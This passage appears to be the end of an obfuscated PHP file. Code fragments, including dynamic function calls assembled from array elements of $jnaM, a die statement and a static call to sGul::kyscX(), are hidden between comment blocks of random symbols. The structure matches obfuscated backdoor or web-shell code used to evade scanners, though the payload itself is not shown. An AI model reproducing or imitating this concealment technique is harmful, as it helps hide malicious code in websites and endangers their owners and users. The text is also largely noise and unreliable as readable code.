S+eepㄨ↮⒦⒯¾㈤⑩⋟╆┻ℝ∬ⅵ⊡▴⒖▱╂⑾┮≁ↅ¡⇖≭╁Ⅷ

-*///
[/*-


➟⒵┸Σ﹄☟Ⓓ⅞⇓✣√♁┏⊖◻◹▌⒧▐۰ⓩⓥ유✁↢♡◀✪


~>g&➟⒵┸Σ﹄☟Ⓓ⅞⇓✣√♁┏⊖◻◹▌⒧▐۰ⓩⓥ유✁↢♡◀✪


-*///
0+7/*-auQbq}%k-*///
] /*-z~z-*///
. /*-b%}-*///
$jnaM/*-
≋▒㊓⊳㊰⋋▷┷▥
kFE^.+≋▒㊓⊳㊰⋋▷┷▥
-*///
[/*-kT1c!hHLh7-*///
2+2/*-


㊌㊧Ↄ≴∂


O>㊌㊧Ↄ≴∂


-*///
]/*-~y`-*///
(/*-t{r[V)_-*///
$wHRV/*-


☟♔➲▥➛↾▕⅑╪〈⊏Ⅻ¶▉◍⑴⏥✩∹⑷┲⋑❼┛⒤∆


oc{^#8☟♔➲▥➛↾▕⅑╪〈⊏Ⅻ¶▉◍⑴⏥✩∹⑷┲⋑❼┛⒤∆


-*///
)/*-!E-@u-*///
 . /*-


↧❷➺◸⋏✱◶


<UT>h!z↧❷➺◸⋏✱◶


-*///
$jnaM/*-ap|^u>-*///
[/*-0<#Ux@-*///
3+5/*-+F>]a9Sa-*///
]/*-T)FYe-*///
);/*-

◦∄♧☼┹╅③⌘ⓒ⋇☮╧﹁➸Ψ웃㈦➝♪╖⇤⋐⋞

=?!%i)-◦∄♧☼┹╅③⌘ⓒ⋇☮╧﹁➸Ψ웃㈦➝♪╖⇤⋐⋞

-*///
/*-

➼ⓥ⓾➨⊋∸↰⊇ⓟ╓⓰◜↞❥➅∪﹟✷﹛⊬≞Ⅵ▎≤⊰￡♯㊥⋉㊇

-Ye[_@2➼ⓥ⓾➨⊋∸↰⊇ⓟ╓⓰◜↞❥➅∪﹟✷﹛⊬≞Ⅵ▎≤⊰￡♯㊥⋉㊇

-*///
die;/*-p3oyt`H-*///
 endif;/*-1QrMiu,V3-*///
 }/*-

✏❾┶⋈

NFg<TU4✏❾┶⋈

-*///
}/*-j-*///
sGul/*-

｜⇟⊉—‹ⓘ✄◨ℱ○➤◿✓┬

Xo｜⇟⊉—‹ⓘ✄◨ℱ○➤◿✓┬

-*///
::/*-ijX<f[@6X-*///
kyscX/*-


﹋⋤Ⓧ


6zFDZ﹋⋤Ⓧ


-*///
();/*-{zv-*///
 ?>